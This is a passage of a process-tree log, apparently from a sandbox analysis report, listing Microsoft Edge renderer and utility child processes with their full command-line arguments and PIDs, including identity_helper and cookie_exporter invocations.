        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4232,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=5104 /prefetch:14
        5⤵
        
        PID:2320
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5852,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=5804 /prefetch:14
        5⤵
        
        PID:2828
      - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
        
        cookie_exporter.exe --cookie-json=1128
        6⤵
        
        PID:3472
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5856,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=5880 /prefetch:14
        5⤵
        
        PID:5680
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5856,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=5880 /prefetch:14
        5⤵
        
        PID:5740
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5976,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=5964 /prefetch:14
        5⤵
        
        PID:6068
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6040,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=6312 /prefetch:14
        5⤵
        
        PID:4840
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6308,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=6272 /prefetch:14
        5⤵
        
        PID:5112
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6380,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=6344 /prefetch:1
        5⤵
        
        PID:2236
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=6368,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=6288 /prefetch:1
        5⤵
        
        PID:2012
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=6052,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=3936 /prefetch:1
        5⤵
        
        PID:2560
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=6484,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=6804 /prefetch:1
        5⤵
        
        PID:2492
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=5912,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=6456 /prefetch:1
        5⤵
        
        PID:2444
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=6660,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=6908 /prefetch:1
        5⤵
        
        PID:6072
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=6876,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=7000 /prefetch:1
        5⤵
        
        PID:6124
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=4920,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=7020 /prefetch:1
        5⤵
        
        PID:2340
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=5892,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=4808 /prefetch:1
        5⤵
        
        PID:5672
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=6424,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=6792 /prefetch:1
        5⤵
        
        PID:3384
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=7160,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=7120 /prefetch:1
        5⤵
        
        PID:3412
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=7048,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=7400 /prefetch:1
        5⤵
        
        PID:5536
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6652,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=4852 /prefetch:14
        5⤵
        
        PID:3368
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6828,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=6324 /prefetch:14
        5⤵
        
        PID:2876
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4872,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=7536 /prefetch:14
        5⤵
        
        PID:2104
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=5572,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=5156 /prefetch:1
        5⤵
        
        PID:6088
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=7644,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=7616 /prefetch:1
        5⤵
        
        PID:3172
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=7688,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=7504 /prefetch:1
        5⤵
        
        PID:3228
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=5356,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=5380 /prefetch:1
        5⤵
        
        PID:1856
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=7580,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=5160 /prefetch:1
        5⤵
        
        PID:2020
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=6472,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=7848 /prefetch:1
        5⤵
        
        PID:4568
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=5380,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=7884 /prefetch:1
        5⤵
        
        PID:1660
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=8120,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=7704 /prefetch:1
        5⤵
        
        PID:1072
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=7028,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=8224 /prefetch:1
        5⤵
        
        PID:5128
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=8316,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=7904 /prefetch:1
        5⤵
        
        PID:2744
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=8672,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=8648 /prefetch:1
        5⤵
        
        PID:3768
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=8840,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=8588 /prefetch:1
        5⤵
        
        PID:460
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=8820,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=8640 /prefetch:1
        5⤵
        
        PID:4384
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=8624,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=8620 /prefetch:1
        5⤵
        
        PID:3924
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8556,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=7860 /prefetch:14
        5⤵
        
        PID:2104
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=5732,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=8548 /prefetch:1
        5⤵
        
        PID:1392
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=8440,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=7892 /prefetch:1
        5⤵
        
        PID:5888
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=9088,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=8908 /prefetch:1
        5⤵
        
        PID:2376
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=9392,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=8808 /prefetch:1
        5⤵
        
        PID:1444
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9312,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=9304 /prefetch:14
        5⤵
        
        PID:2400
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=8956,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=9264 /prefetch:1
        5⤵
        
        PID:5172
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=7964,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=9520 /prefetch:1
        5⤵
        
        PID:4704
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=9500,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=9680 /prefetch:1
        5⤵
        
        PID:2492
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=9308,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=9400 /prefetch:1
        5⤵
        
        PID:1464
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=9320,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=9840 /prefetch:1
        5⤵
        
        PID:1708
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=9720,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=9888 /prefetch:1
        5⤵
        
        PID:2024
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9532,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=9656 /prefetch:14
        5⤵
        
        PID:488
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=9852,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=9736 /prefetch:1
        5⤵
        
        PID:1640
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=9496,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=9812 /prefetch:1
        5⤵
        
        PID:3892
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=10040,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=9756 /prefetch:1
        5⤵
        
        PID:6364
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=10252,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=10092 /prefetch:1
        5⤵
        
        PID:6464
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=8904,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=10220 /prefetch:1
        5⤵
        
        PID:6672
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=10460,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=10136 /prefetch:1
        5⤵
        
        PID:6820
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=9396,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=10276 /prefetch:1
        5⤵
        
        PID:7008
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
